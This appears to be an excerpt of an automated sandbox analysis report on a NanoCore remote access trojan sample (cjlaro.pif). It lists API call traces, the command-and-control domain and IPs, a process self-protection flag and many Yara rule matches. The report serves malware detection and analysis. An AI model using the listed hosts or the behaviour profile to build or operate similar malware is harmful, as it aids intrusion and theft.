    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0116399B GetFileAttributesW,FindFirstFileW,FindClose,20_2_0116399B
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01182408 FindFirstFileW,LdrInitializeThunk,Sleep,FindNextFileW,FindClose,20_2_01182408
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0117280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_0117280D
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_01161A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_01161A73
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0118CAE7 FindFirstFileW,FindNextFileW,FindClose,20_2_0118CAE7
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0117BCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,20_2_0117BCB3
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0117BF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_0117BF17
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 20_2_0118DE7C FindFirstFileW,FindClose,20_2_0118DE7C

    Networking:

    barindex
    Connects to many ports of the same IP (likely port scanning)Show sources
    Source: global trafficTCP traffic: 185.19.85.175 ports 2,4,5,6,8,48562
    Source: global trafficTCP traffic: 197.210.84.227 ports 2,4,5,6,8,48562
    Uses dynamic DNS servicesShow sources
    Source: unknownDNS query: name: strongodss.ddns.net
    Source: global trafficTCP traffic: 192.168.2.3:49746 -> 197.210.84.227:48562
    Source: global trafficTCP traffic: 192.168.2.3:49764 -> 185.19.85.175:48562
    Source: RegSvcs.exe, 00000005.00000002.556279118.0000000000E08000.00000004.00000020.sdmpString found in binary or memory: http://crl.micrH
    Source: RegSvcs.exe, 00000005.00000002.556279118.0000000000E08000.00000004.00000020.sdmpString found in binary or memory: http://crl.microsof
    Source: RegSvcs.exe, 00000005.00000002.557771680.0000000002A31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: cjlaro.pif, 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp, cjlaro.pif, 0000000A.00000002.337157263.00000000011DB000.00000002.00020000.sdmp, cjlaro.pif, 00000014.00000000.348819086.00000000011DB000.00000002.00020000.sdmpString found in binary or memory: http://www.onnodb.com/aetraymenuH(
    Source: unknownDNS traffic detected: queries for: strongodss.ddns.net
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01172361 InternetReadFile,4_2_01172361
    Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
    Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
    Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
    Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
    Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
    Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
    Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
    Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
    Source: unknownTCP traffic detected without corresponding DNS query: 185.19.85.175
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_01186308 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,4_2_01186308
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0118A0FC OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_0118A0FC
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_0119D8E9 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,LdrInitializeThunk,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,4_2_0119D8E9
    Source: cjlaro.pif, 00000004.00000002.334930499.000000000194A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
    Source: RegSvcs.exe, 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmpBinary or memory string: RegisterRawInputDevices
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 4_2_011AC7D6 SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,4_2_011AC7D6
    Source: C:\Users\user\77066510\cjlaro.pifCode function: 10_2_011AC7D6 SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,10_2_011AC7D6

    E-Banking Fraud:

    barindex
    Yara detected Nanocore RATShow sources
    Source: Yara matchFile source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4e6e068.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4ed7078.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a807ce.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.61b0000.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.61b4629.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.4.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4e05058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4ed7078.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.496b880.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.7.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.61b0000.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a8b041.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4899c50.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a8560b.4.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 4.3.cjlaro.pif.4e6e068.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4902870.9.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 5.2.RegSvcs.exe.3a8b041.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4865448.3.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 20.3.cjlaro.pif.4899c50.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383566865.00000000047F3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.385418574.0000000004828000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000019.00000002.390692877.0000000000F62000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386694211.0000000004721000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.364780852.000000000489A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386537145.00000000047F2000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000019.00000002.391670186.0000000003411000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383169195.00000000047BF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.385532540.00000000010C3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000019.00000002.391832360.0000000004419000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.316144236.0000000004E6E000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360433850.0000000004903000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.560490990.00000000061B0000.00000004.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360821611.000000000496B000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314585596.0000000004E06000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315927794.0000000004E06000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.559058243.0000000003A79000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386511135.000000000478A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.316303784.0000000004DD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383645453.000000000485B000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.366099101.0000000004902000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.315764008.0000000004E3A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.370237585.0000000004831000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386616181.0000000004756000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383202245.0000000004721000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383407849.00000000047BF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.369728872.0000000004866000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.363076349.00000000039E5000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.316393189.0000000004D88000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001E.00000002.406011428.0000000000D02000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360037831.0000000004831000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383348180.0000000004756000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314529331.0000000004E3A000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360563466.0000000004903000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360697455.0000000004938000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314683885.0000000004EA3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314613880.0000000004DD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.557771680.0000000002A31000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.366655070.0000000004902000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000003.314455197.0000000004DD1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383504563.00000000047F3000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360273834.0000000004866000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001E.00000002.411732283.00000000033A1000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386566314.00000000047F2000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.360354824.00000000048CF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.386381872.00000000047BF000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001E.00000002.412114966.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383082558.0000000004756000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000014.00000003.359604202.0000000004866000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000001B.00000003.383597669.0000000004828000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 5028, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6364, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: cjlaro.pif PID: 7152, type: MEMORYSTR

    Operating System Destruction:

    barindex
    Protects its processes via BreakOnTermination flagShow sources
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: 01 00 00 00 Jump to behavior

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 5.2.RegSvcs.exe.2a67f10.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 5.2.RegSvcs.exe.3a807ce.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.48ce458.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 5.2.RegSvcs.exe.6110000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 20.3.cjlaro.pif.496b880.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.496b880.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 4.3.cjlaro.pif.4e6e068.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 4.3.cjlaro.pif.4e6e068.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 4.3.cjlaro.pif.4ed7078.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 4.3.cjlaro.pif.4ed7078.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 5.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 5.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 5.2.RegSvcs.exe.3a807ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 5.2.RegSvcs.exe.3a807ce.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 5.2.RegSvcs.exe.61b0000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.496b880.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.496b880.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 20.3.cjlaro.pif.496b880.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.496b880.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 5.2.RegSvcs.exe.61b4629.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 20.3.cjlaro.pif.4902870.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 20.3.cjlaro.pif.4902870.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 4.3.cjlaro.pif.4e05058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 4.3.cjlaro.pif.4e05058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 4.3.cjlaro.pif.4ed7078.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 4.3.cjlaro.pif.4ed7078.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 20.3.cjlaro.pif.496b880.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.496b880.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 20.3.cjlaro.pif.4902870.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 5.2.RegSvcs.exe.61b0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 5.2.RegSvcs.exe.3a8b041.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 20.3.cjlaro.pif.4899c50.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4899c50.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 5.2.RegSvcs.exe.5630000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 5.2.RegSvcs.exe.3a8560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 5.2.RegSvcs.exe.3a8560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 4.3.cjlaro.pif.4e6e068.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 4.3.cjlaro.pif.4e6e068.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 5.2.RegSvcs.exe.2a6cd70.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4902870.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 5.2.RegSvcs.exe.2a67f10.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 5.2.RegSvcs.exe.3a8b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4865448.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4865448.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 20.3.cjlaro.pif.4899c50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 20.3.cjlaro.pif.4899c50.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000005.00000002.560410383.0000000006110000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383284019.000000000478A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.315424551.0000000004EA3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000005.00000002.555314514.0000000000502000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.359982101.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.363952559.00000000048CF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.383566865.00000000047F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.383566865.00000000047F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.385418574.0000000004828000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.385418574.0000000004828000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.363022584.0000000004938000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000014.00000003.360137256.000000000489A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000019.00000002.390692877.0000000000F62000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000019.00000002.390692877.0000000000F62000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.314549221.0000000004D88000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000001B.00000003.386694211.0000000004721000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000001B.00000003.386694211.0000000004721000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000004.00000003.315994973.0000000004E6E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
